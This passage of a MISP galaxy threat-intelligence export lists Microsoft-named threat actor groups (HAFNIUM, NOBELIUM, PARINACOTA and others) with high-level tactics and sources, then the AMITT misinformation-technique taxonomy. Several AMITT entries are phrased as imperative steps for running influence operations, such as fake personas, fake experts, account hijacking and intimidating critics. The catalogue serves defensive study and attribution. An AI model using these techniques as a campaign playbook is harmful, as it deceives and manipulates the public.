TG-4127
Group-4127
Sofacy
Grey-Cloud

View relationships graph

STRONTIUM has relationships with:

similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Sofacy" with estimative-language:likelihood-probability="likely"

Table 2990. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/
http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_A_Profile_Of_A_Persistent_Adversary_English.pdf
https://blogs.technet.microsoft.com/mmpc/2015/11/16/microsoft-security-intelligence-report-strontium/
https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/
https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/

DUBNIUM

DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features.

The tag is: misp-galaxy:microsoft-activity-group="DUBNIUM"

DUBNIUM is also known as:

darkhotel

View relationships graph

DUBNIUM has relationships with:

similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

Table 2991. Table References
Links
https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/
https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2
https://blogs.technet.microsoft.com/mmpc/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/
https://blogs.technet.microsoft.com/mmpc/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.

The tag is: misp-galaxy:microsoft-activity-group="PLATINUM"

View relationships graph

PLATINUM has relationships with:

similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 2992. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/
http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

BARIUM

Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware, supporting infrastructure, online personas, victimology, and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity. Microsoft labels activity groups using code names derived from elements in the periodic table. In the case of this malware, the activity groups strongly associated with Winnti are BARIUM and LEAD. But even though they share the use of Winnti, the BARIUM and LEAD activity groups are involved in very different intrusion scenarios. BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms. Once BARIUM has established rapport, they spear-phish the victim using a variety of unsophisticated malware installation vectors, including malicious shortcut (.lnk) files with hidden payloads, compiled HTML help (.chm) files, or Microsoft Office documents containing macros or exploits. Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles, collaborative document editing sites, and blogs for C&C. Later stages of the intrusions rely upon Winnti for persistent access. The majority of victims recorded to date have been in electronic gaming, multimedia, and Internet content industries, although occasional intrusions against technology companies have occurred.

The tag is: misp-galaxy:microsoft-activity-group="BARIUM"

Table 2993. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

LEAD

In contrast, LEAD has established a far greater reputation for industrial espionage. In the past few years, LEAD’s victims have included: Multinational, multi-industry companies involved in the manufacture of textiles, chemicals, and electronics Pharmaceutical companies A company in the chemical industry University faculty specializing in aeronautical engineering and research A company involved in the design and manufacture of motor vehicles A cybersecurity company focusing on protecting industrial control systems During these intrusions, LEAD’s objective was to steal sensitive data, including research materials, process documents, and project plans. LEAD also steals code-signing certificates to sign its malware in subsequent attacks. In most cases, LEAD’s attacks do not feature any advanced exploit techniques. The group also does not make special effort to cultivate victims prior to an attack. Instead, the group often simply emails a Winnti installer to potential victims, relying on basic social engineering tactics to convince recipients to run the attached malware. In some other cases, LEAD gains access to a target by brute-forcing remote access login credentials, performing SQL injection, or exploiting unpatched web servers, and then they copy the Winnti installer directly to compromised machines.

The tag is: misp-galaxy:microsoft-activity-group="LEAD"

Table 2994. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

ZIRCONIUM

In addition to strengthening generic detection of EoP exploits, Microsoft security researchers are actively gathering threat intelligence and indicators attributable to ZIRCONIUM, the activity group using the CVE-2017-0005 exploit.

The tag is: misp-galaxy:microsoft-activity-group="ZIRCONIUM"

Table 2995. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/

https://www.cfr.org/interactive/cyber-operations/mythic-leopard

This threat actor uses social engineering and spear phishing to target military and defense organizations in India, for the purpose of espionage.

The tag is: misp-galaxy:microsoft-activity-group="https://www.cfr.org/interactive/cyber-operations/mythic-leopard"

https://www.cfr.org/interactive/cyber-operations/mythic-leopard is also known as:

C-Major
Transparent Tribe

View relationships graph

https://www.cfr.org/interactive/cyber-operations/mythic-leopard has relationships with:

similar: misp-galaxy:threat-actor="Operation C-Major" with estimative-language:likelihood-probability="likely"

Table 2996. Table References
Links
https://www.cfr.org/interactive/cyber-operations/mythic-leopard

GALLIUM

Microsoft Threat Intelligence Center (MSTIC) is raising awareness of the ongoing activity by a group we call GALLIUM, targeting telecommunication providers. When Microsoft customers have been targeted by this activity, we notified them directly with the relevant information they need to protect themselves. By sharing the detailed methodology and indicators related to GALLIUM activity, we’re encouraging the security community to implement active defenses to secure the broader ecosystem from these attacks. To compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss. Once persistence is established in a network, GALLIUM uses common techniques and tools like Mimikatz to obtain credentials that allows for lateral movement across the target network. Within compromised networks, GALLIUM makes no attempt to obfuscate their intent and are known to use common versions of malware and publicly available toolkits with small modifications. The operators rely on low cost and easy to replace infrastructure that consists of dynamic-DNS domains and regularly reused hop points. This activity from GALLIUM has been identified predominantly through 2018 to mid-2019. GALLIUM is still active; however, activity levels have dropped when compared to what was previously observed.

The tag is: misp-galaxy:microsoft-activity-group="GALLIUM"

GALLIUM is also known as:

Operation Soft Cell

View relationships graph

GALLIUM has relationships with:

similar: misp-galaxy:threat-actor="Operation Soft Cell" with estimative-language:likelihood-probability="likely"

Table 2997. Table References
Links
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

PARINACOTA

One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA’s attacks typically brute forces their way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortext, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.

The tag is: misp-galaxy:microsoft-activity-group="PARINACOTA"

View relationships graph

PARINACOTA has relationships with:

uses: misp-galaxy:ransomware="Wadhrama" with estimative-language:likelihood-probability="likely"

Table 2998. Table References
Links
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

GADOLINIUM

GADOLINIUM is a nation-state activity group that has been compromising targets for nearly a decade with a worldwide focus on the maritime and health industries. As with most threat groups, GADOLINIUM tracks the tools and techniques of security practitioners looking for new techniques they can use or modify to create new exploit methods. Historically, GADOLINIUM used custom-crafted malware families that analysts can identify and defend against. In response, over the last year GADOLINIUM has begun to modify portions of its toolchain to use open-source toolkits to obfuscate their activity and make it more difficult for analysts to track. Because cloud services frequently offer a free trial or one-time payment (PayGo) account offerings, malicious actors have found ways to take advantage of these legitimate business offerings. By establishing free or PayGo accounts, they can use cloud-based technology to create a malicious infrastructure that can be established quickly then taken down before detection or given up at little cost.

The tag is: misp-galaxy:microsoft-activity-group="GADOLINIUM"

Table 2999. Table References
Links
https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

HAFNIUM

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: misp-galaxy:microsoft-activity-group="HAFNIUM"

Table 3000. Table References
Links
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

NOBELIUM

Threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware.

The tag is: misp-galaxy:microsoft-activity-group="NOBELIUM"

View relationships graph

NOBELIUM has relationships with:

similar: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:backdoor="SUNBURST" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:tool="TEARDROP" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:tool="GoldMax" with estimative-language:likelihood-probability="likely"

Table 3001. Table References
Links
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Misinformation Pattern

AM!TT Technique.

Misinformation Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: misinfosecproject

5Ds (dismiss, distort, distract, dismay, divide)

Nimmo’s "4Ds of propaganda": dismiss, distort, distract, dismay (MisinfosecWG added divide in 2019). Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

The tag is: misp-galaxy:amitt-misinformation-pattern="5Ds (dismiss, distort, distract, dismay, divide)"

Table 3002. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0001.md

Facilitate State Propaganda

Organize citizens around pro-state messaging. Paid or volunteer groups coordinated to push state propaganda (examples include 2016 Diba Facebook Expedition, coordinated to overcome China’s Great Firewall to flood the Facebook pages of Taiwanese politicians and news agencies with a pro-PRC message).

The tag is: misp-galaxy:amitt-misinformation-pattern="Facilitate State Propaganda"

Table 3003. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0002.md

Leverage Existing Narratives

Use or adapt existing narrative themes, where narratives are the baseline stories of a target audience. Narratives form the bedrock of our worldviews. New information is understood through a process firmly grounded in this bedrock. If new information is not consitent with the prevailing narratives of an audience, it will be ignored. Effective campaigns will frame their misinformation in the context of these narratives. Highly effective campaigns will make extensive use of audience-appropriate archetypes and meta-narratives throughout their content creation and amplifiction practices. Examples include midwesterners are generous, Russia is under attack from outside.

The tag is: misp-galaxy:amitt-misinformation-pattern="Leverage Existing Narratives"

Table 3004. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0003.md

Competing Narratives

Advance competing narratives connected to same issue ie: on one hand deny incident while at same time expresses dismiss. MH17 (example) "Russian Foreign Ministry again claimed that “absolutely groundless accusations are put forward against the Russian side, which are aimed at discrediting Russia in the eyes of the international community" (deny); "The Dutch MH17 investigation is biased, anti-Russian and factually inaccurate" (dismiss).

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: misp-galaxy:amitt-misinformation-pattern="Competing Narratives"

Table 3005. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0004.md

Center of Gravity Analysis

Recon/research to identify "the source of power that provides moral or physical strength, freedom of action, or will to act." Thus, the center of gravity is usually seen as the "source of strength". Includes demographic and network analysis of communities

The tag is: misp-galaxy:amitt-misinformation-pattern="Center of Gravity Analysis"

Table 3006. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0005.md

Create Master Narratives

The promotion of beneficial master narratives is perhaps the most effective method for achieving long-term strategic narrative dominance. From a "whole of society" perpective the promotion of the society’s core master narratives should occupy a central strategic role. From a misinformation campaign / cognitive security perpectve the tactics around master narratives center more precisely on the day-to-day promotion and reinforcement of this messaging. In other words, beneficial, high-coverage master narratives are a central strategic goal and their promotion consitutes an ongoing tactical struggle carried out at a whole-of-society level.

By way of example, major powers are promoting master narratives such as: * "Huawei is detetmined to build trustworthy networks" * "Russia is the victim of bullying by NATO powers" * "USA is guided by its founding principles of liberty and egalitarianism"

Tactically, their promotion covers a broad spectrum of activities both on- and offline.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create Master Narratives"

Table 3007. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0006.md

Create fake Social Media Profiles / Pages / Groups

Create key social engineering assets needed to amplify content, manipulate algorithms, fool public and/or specific incident/campaign targets.

Computational propaganda depends substantially on false perceptions of credibility and acceptance. By creating fake users and groups with a variety of interests and commitments, attackers can ensure that their messages both come from trusted sources and appear more widely adopted than they actually are.

Examples: Ukraine elections (2019) circumvent Facebook’s new safeguards by paying Ukrainian citizens to give a Russian agent access to their personal pages. EU Elections (2019) Avaaz reported more than 500 suspicious pages and groups to Facebook related to the three-month investigation of Facebook disinformation networks in Europe. Mueller report (2016) The IRA was able to reach up to 126 million Americans on Facebook via a mixture of fraudulent accounts, groups, and advertisements, the report says. Twitter accounts it created were portrayed as real American voices by major news outlets. It was even able to hold real-life rallies, mobilizing hundreds of people at a time in major cities like Philadelphia and Miami.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake Social Media Profiles / Pages / Groups"

Table 3008. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0007.md

Create fake or imposter news sites

Modern computational propaganda makes use of a cadre of imposter news sites spreading globally. These sites, sometimes motivated by concerns other than propaganda—for instance, click-based revenue—often have some superficial markers of authenticity, such as naming and site-design. But many can be quickly exposed with reference to their owenership, reporting history and adverstising details. A prominent case from the 2016 era was the Denver Guardian, which purported to be a local newspaper in Colorado and specialized in negative stories about Hillary Clinton.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake or imposter news sites"

Table 3009. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0008.md

Create fake experts

Stories planted or promoted in computational propaganda operations often make use of experts fabricated from whole cloth, sometimes specifically for the story itself. For example, in the Jade Helm conspiracy theory promoted by SVR in 2015, a pair of experts—one of them naming himself a “Military Intelligence Analyst / Russian Regional CME” and the other a “Geopolitical Strategist, Journalist & Author”--pushed the story heavily on LinkedIn.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake experts"

Table 3010. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0009.md

Cultivate useful idiots

Cultivate propagandists for a cause, the goals of which are not fully comprehended, and who are used cynically by the leaders of the cause. Independent actors use social media and specialised web sites to strategically reinforce and spread messages compatible with their own. Their networks are infiltrated and used by state media disinformation organisations to amplify the state’s own disinformation strategies against target populations. Many are traffickers in conspiracy theories or hoaxes, unified by a suspicion of Western governments and mainstream media. Their narratives, which appeal to leftists hostile to globalism and military intervention and nationalists against immigration, are frequently infiltrated and shaped by state-controlled trolls and altered news items from agencies such as RT and Sputnik. Also know as "useful idiots" or "unwitting agents".

The tag is: misp-galaxy:amitt-misinformation-pattern="Cultivate useful idiots"

Table 3011. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0010.md

Hijack legitimate account

Hack or take over legimate accounts to distribute misinformation or damaging content. Examples include Syrian Electronic Army (2013) series of false tweets from a hijacked Associated Press Twitter account claiming that President Barack Obama had been injured in a series of explosions near the White House. The false report caused a temporary plunge of 143 points on the Dow Jones Industrial Average.

The tag is: misp-galaxy:amitt-misinformation-pattern="Hijack legitimate account"

Table 3012. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0011.md

Use concealment

Use anonymous social media profiles. Examples include page or group administrators, masked "whois" website directory data, no bylines connected to news article, no masthead connect to news websites.

Example is 2016 @TEN_GOP profile where the actual Tennessee Republican Party tried unsuccessfully for months to get Twitter to shut it down, and 2019 Endless Mayfly is an Iran-aligned network of inauthentic personas and social media accounts that spreads falsehoods and amplifies narratives critical of Saudi Arabia, the United States, and Israel.

The tag is: misp-galaxy:amitt-misinformation-pattern="Use concealment"

Table 3013. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0012.md

Create fake websites

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake websites"

Table 3014. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0013.md

Create funding campaigns

Generate revenue through online funding campaigns. e.g. Gather data, advance credible persona via Gofundme; Patreon; or via fake website connecting via PayPal or Stripe. (Example 2016) #VaccinateUS Gofundme campaigns to pay for Targetted facebook ads (Larry Cook, targetting Washington State mothers, $1,776 to boost posts over 9 months).

The tag is: misp-galaxy:amitt-misinformation-pattern="Create funding campaigns"

Table 3015. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0014.md

Create hashtag

Many incident-based campaigns will create a hashtag to promote their fabricated event (e.g. #ColumbianChemicals to promote a fake story about a chemical spill in Louisiana).

Creating a hashtag for an incident can have two important effects: 1. Create a perception of reality around an event. Certainly only "real" events would be discussed in a hashtag. After all, the event has a name! 2. Publicize the story more widely through trending lists and search behavior

Asset needed to direct/control/manage "conversation" connected to launching new incident/campaign with new hashtag for applicable social media sites ie: Twitter, LinkedIn)

The tag is: misp-galaxy:amitt-misinformation-pattern="Create hashtag"

Table 3016. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0015.md

Clickbait

Create attention grabbing headlines (outrage, doubt, humor) required to drive traffic & engagement. (example 2016) “Pope Francis shocks world, endorses Donald Trump for president.” (example 2016) "FBI director received millions from Clinton Foundation, his brother’s law firm does Clinton’s taxes”. This is a key asset

The tag is: misp-galaxy:amitt-misinformation-pattern="Clickbait"

Table 3017. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0016.md

Promote online funding

Drive traffic/engagement to funding campaign sites; helps provide measurable metrics to assess conversion rates

The tag is: misp-galaxy:amitt-misinformation-pattern="Promote online funding"

Table 3018. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0017.md

Paid targeted ads

Create or fund advertisements targeted at specific populations

The tag is: misp-galaxy:amitt-misinformation-pattern="Paid targeted ads"

Table 3019. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0018.md

Generate information pollution

Flood social channels; drive traffic/engagement to all assets; create aura/sense/perception of pervasiveness/consensus (for or against or both simultaneously) of an issue or topic. "Nothing is true, but everything is possible." Akin to astroturfing campaign.

The tag is: misp-galaxy:amitt-misinformation-pattern="Generate information pollution"

Table 3020. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0019.md

Trial content

Iteratively test incident performance (messages, content etc), e.g. A/B test headline/content enagagement metrics; website and/or funding campaign conversion rates

The tag is: misp-galaxy:amitt-misinformation-pattern="Trial content"

Table 3021. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0020.md

Memes

Memes are one of the most important single artefact types in all of computational propaganda. Memes in this framework denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:amitt-misinformation-pattern="Memes"

Table 3022. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0021.md

Conspiracy narratives

"Conspiracy narratives appeal to the human desire for explanatory order, by invoking the participation of poweful (often sinister) actors in pursuit of their own political goals. These narratives are especially appealing when an audience is low-information, marginalized or otherwise inclined to reject the prevailing explanation. Conspiracy narratives are an important component of the ""firehose of falsehoods"" model.

Example: QAnon: conspiracy theory is an explanation of an event or situation that invokes a conspiracy by sinister and powerful actors, often political in motivation, when other explanations are more probable "

The tag is: misp-galaxy:amitt-misinformation-pattern="Conspiracy narratives"

Table 3023. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0022.md

Distort facts

Change, twist, or exaggerate existing facts to construct a narrative that differs from reality. Examples: images and ideas can be distorted by being placed in an improper content

The tag is: misp-galaxy:amitt-misinformation-pattern="Distort facts"

Table 3024. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0023.md

Create fake videos and images

Create fake videos and/or images by manipulating existing content or generating new content (e.g. deepfakes). Examples include Pelosi video (making her appear drunk) and photoshoped shark on flooded streets of Houston TX.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake videos and images"

Table 3025. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0024.md

Leak altered documents

Obtain documents (eg by theft or leak), then alter and release, possibly among factual documents/sources.

Example (2019) DFRLab report "Secondary Infektion” highlights incident with key asset being a forged “letter” created by the operation to provide ammunition for far-right forces in Europe ahead of the election.

The tag is: misp-galaxy:amitt-misinformation-pattern="Leak altered documents"

Table 3026. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0025.md

Create fake research

Create fake academic research. Example: fake social science research is often aimed at hot-button social issues such as gender, race and sexuality. Fake science research can target Climate Science debate or pseudoscience like anti-vaxx

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake research"

Table 3027. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0026.md

Adapt existing narratives

Adapting existing narratives to current operational goals is the tactical sweet-spot for an effective misinformation campaign. Leveraging existing narratives is not only more effective, it requires substantially less resourcing, as the promotion of new master narratives operates on a much larger scale, both time and scope. Fluid, dynamic & often interchangable key master narratives can be ("The morally corrupt West") adapted to divisive (LGBT proganda) or to distort (individuals working as CIA operatives). For Western audiences, different but equally powerful framings are available, such as "USA has a fraught history in race relations, espically in crimincal justice areas."

The tag is: misp-galaxy:amitt-misinformation-pattern="Adapt existing narratives"

Table 3028. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0027.md

Create competing narratives

"Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create competing narratives"

Table 3029. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0028.md

Manipulate online polls

Create fake online polls, or manipulate existing online polls. Examples: flooding FCC with comments; creating fake engagement metrics of Twitter/Facebook polls to manipulate perception of given issue. Data gathering tactic to target those who engage, and potentially their networks of friends/followers as well

The tag is: misp-galaxy:amitt-misinformation-pattern="Manipulate online polls"

Table 3030. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0029.md

Backstop personas

Create other assets/dossier/cover/fake relationships and/or connections or documents, sites, bylines, attributions, to establish/augment/inflate crediblity/believability

The tag is: misp-galaxy:amitt-misinformation-pattern="Backstop personas"

Table 3031. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0030.md

YouTube

Use YouTube as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="YouTube"

Table 3032. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0031.md

Use Reddit as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Reddit"

Table 3033. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0032.md

Instagram

Use Instagram as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Instagram"

Table 3034. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0033.md

Use LinkedIn as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="LinkedIn"

Table 3035. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0034.md

Use Pinterest as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Pinterest"

Table 3036. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0035.md

Use WhatsApp as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="WhatsApp"

Table 3037. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0036.md

Facebook

Use Facebook as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Facebook"

Table 3038. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0037.md

Twitter

Use Twitter as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter"

Table 3039. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0038.md

Bait legitimate influencers

The tag is: misp-galaxy:amitt-misinformation-pattern="Bait legitimate influencers"

Table 3040. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0039.md

Demand unsurmountable proof

The tag is: misp-galaxy:amitt-misinformation-pattern="Demand unsurmountable proof"

Table 3041. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0040.md

Deny involvement

The tag is: misp-galaxy:amitt-misinformation-pattern="Deny involvement"

Table 3042. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0041.md

Kernel of Truth

The tag is: misp-galaxy:amitt-misinformation-pattern="Kernel of Truth"

Table 3043. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0042.md

Use SMS/ WhatsApp/ Chat apps

The tag is: misp-galaxy:amitt-misinformation-pattern="Use SMS/ WhatsApp/ Chat apps"

Table 3044. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0043.md

Seed distortions

The tag is: misp-galaxy:amitt-misinformation-pattern="Seed distortions"

Table 3045. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0044.md

Use fake experts

Use the fake experts that were set up in T0009. Pseudo-experts are disposable assets that often appear once and then disappear. Give "credility" to misinformation. Take advantage of credential bias

The tag is: misp-galaxy:amitt-misinformation-pattern="Use fake experts"

Table 3046. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0045.md

Search Engine Optimization

Manipulate content engagement metrics (ie: Reddit & Twitter) to influence/impact news search results (e.g. Google), also elevates RT & Sputnik headline into Google news alert emails. aka "Black-hat SEO"

The tag is: misp-galaxy:amitt-misinformation-pattern="Search Engine Optimization"

Table 3047. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0046.md

Muzzle social media as a political force

Use political influence or the power of state to stop critical social media comments. Government requested/driven content take downs (see Google Transperancy reports. (Example 20190 Singapore Protection from Online Falsehoods and Manipulation Bill would make it illegal to spread "false statements of fact" in Singapore, where that information is "prejudicial" to Singapore’s security or "public tranquility." Or India/New Delhi has cut off services to Facebook and Twitter in Kashmir 28 times in the past five years, and in 2016, access was blocked for five months — on the grounds that these platforms were being used for anti-social and "anti-national" purposes.

The tag is: misp-galaxy:amitt-misinformation-pattern="Muzzle social media as a political force"

Table 3048. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0047.md

Cow online opinion leaders

Intimidate, coerce, threaten critics/dissidents/journalists via trolling, doxing. Phillipines (example) Maria Ressa and Rappler journalists targeted Duterte regime, lawsuits, trollings, banned from the presidential palace where press briefings take place. 2017 Bot attack on five ProPublica Journalists.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cow online opinion leaders"

Table 3049. Table References
Links
https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0048.md

Flooding

